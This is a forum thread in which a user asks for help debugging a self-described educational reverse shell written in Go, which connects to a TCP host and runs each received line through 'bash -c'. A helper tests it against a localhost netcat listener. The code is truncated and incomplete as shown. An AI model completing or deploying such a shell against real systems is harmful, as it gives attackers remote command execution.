Cybersecurity Testing

I’m building a reverse bash shell for educational purposes only. I have the following code but am getting an error with it. Any help would be greatly appreciated. I can also work via PMs. What am I missing?

//this is my first reverse shell written in go lang
package main

import (

func main() {

func shell(host string) {
	conn, err := net.Dial("tcp", host)
	if err != nil {

	for {
		message, _ := bufio.NewReader(conn).ReadString('\n')
		out, err := exec.Command("bash", "-c", message).CombinedOutput()
		if err != nil {

The error:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x1067c00]

goroutine 1 [running]:
	/usr/local/go/src/bufio/bufio.go:100 +0xe0
bufio.(*Reader).ReadSlice(0xc000050ed0, 0x129650a, 0x1154601, 0x101000000000001, 0x0, 0x1000, 0xc0000dc000)
	/usr/local/go/src/bufio/bufio.go:356 +0x3d
bufio.(*Reader).ReadBytes(0xc000050ed0, 0x100a, 0x1000, 0xc0000dc000, 0x0, 0x113046f, 0xe)
	/usr/local/go/src/bufio/bufio.go:434 +0x70
	/Path/to/main.go:15 +0x1fb
exit status 2

What is a

supposed to do? What kind of application is listeing on port 4444?

The application listening on 4444 is netcat. Here is a link to what it does:

OK. Not that your question is complete, let me try to reproduce your problem.

In shell 1:

$ netcat -l -k localhost 4444

In shell 2:

$ go run main.go # your code

Back in shell 1:

Fr 26. Apr 16:01:58 CEST 2019

Works nice.

1 Like

Oh, are you saying the code is working for you?

Yes, it works.

I can not reproduce your problem.

Interesting, thank you. How do you handle testing environmental variables outside of your code? I’m running this code on the same box and the testing box… maybe that is why? Thank you for your time!

What do you mean by this?

Do you use any environment variables with this short program? How?

Disregard that last statement. Thank you again.